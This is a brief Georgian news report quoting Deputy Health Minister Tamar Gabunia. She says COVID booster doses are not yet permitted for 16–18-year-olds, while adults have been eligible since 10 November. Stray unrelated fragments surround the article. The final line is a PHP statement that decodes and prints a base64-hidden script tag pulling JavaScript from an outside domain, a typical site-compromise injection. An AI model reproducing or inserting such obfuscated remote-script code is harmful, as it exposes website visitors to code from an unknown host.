celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის მოადგილის, თამარ გაბუნიას განცხადებით, ჯერჯერობით 16-დან 18 წლამდე ასაკობრივ კატეგორიაში ე.წ. ბუსტერ დოზა დაშვებული არ არის.
 
როგორც მან „ინტერპრესნიუსს“ განუცხადა, თუ ეს საკითხი დღის წესრიგში დადგება, ამ თემაზე იმუნიზაციის საბჭო იმსჯელებს.
 
„ჩვენ 16-დან 18 წლამდე ასაკობრივ კატეგორიაში არ ვიყენებთ ჯერჯერობით "ბუსტერს". სამომავლოდ, თუ იქნება მეტი მეცნიერული მონაცემები იმასთან დაკავშირებით, რომ ამ ასაკობრივ ჯგუფში „ბუსტერი" მნიშვნელოვანია, ამას ჩვენი იმუნიზაციის საბჭო გაითვალისწინებს და რეკომენდაციას გასცემს“, - განაცხადა გაბუნიამ.
 
ცნობისთვის, საქართველოში მოქმედი პროტოკოლის თანახმად, ე.წ. ბუსტერ-დოზით ვაქცინაცია 10 ნოემბრიდანაა დაშვებული. მისი მიღება მოქალაქეებს 18 წლიდან შეუძლიათ.
856
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");